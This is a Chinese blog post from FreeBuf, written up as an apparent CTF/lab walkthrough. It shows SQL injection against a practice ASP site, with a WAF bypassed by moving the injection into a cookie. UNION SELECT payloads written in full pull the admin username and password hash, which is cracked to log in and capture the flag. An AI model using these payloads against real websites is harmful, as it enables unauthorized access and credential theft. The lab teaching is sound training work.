官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
第二章:遇到阻难!绕过WAF过滤
铁壁阿童木Y- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
第二章:遇到阻难!绕过WAF过滤
本文由
铁壁阿童木Y 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
0X01.得到目标站点
0X02.打开目标网站并查找注入点
0X03.查找注入点
and 1 = 1 #猜测可能存在一个waf
1.查找回显点,order by 10 返回正常
order by 11 显示错误
2.查看回显字段,可以看到是有waf拦截
3.使用cookie注入。
采用cookie注入,注入前要利用一个工具ModHeader,下载解压后可以得到一个以crx后缀名的文件,将此后缀改为zip,再次解压即可得到所要文件。
将整个文件夹拖入到chrome浏览器的推展程序中即可
个人原因,谷歌浏览器不行,采用火狐,添加一个请求头cookie,内容为id=171
再次访问,
http://kypt8004.ia.aqlab.cn/shownews.asp
可以看到与之前的效果是一样的。
4.注入点查看
在刚刚的cookie注入中,将payload设置为
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
再次刷新页面可以看到成功显示,2,3,7,8,9
0X04.数据查询
查询username,password
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
得到账号密码
admin/b9a2a2b5dffb918c
破解结果
0X05.获取flag
登录后台
admin/welcome
拿到flag
zkz{welcome-control}
0X06.总结
1.查找可以注入的页面
2.测试是否存在注入点
3.如果有waf,拦截的可能是post和get,可以尝试cookie注入
4.逐步拿到账号权限
5.登录后台拿到flag
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
铁壁阿童木Y
这家伙太懒了,还未填写个人描述!
已在FreeBuf发表 18 篇文章
本文为 铁壁阿童木Y 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
封神台-掌控安全在线演练靶场
相关推荐
铁壁阿童木Y LV.5
这家伙太懒了,还未填写个人描述!
- 18 文章数
- 9 关注者
第五章:SYSTEM!POWER!
2023-02-06
第四章:进击!拿到Web最高权限!
2023-01-03
FofaViewer的安装与使用
2022-12-28
文章目录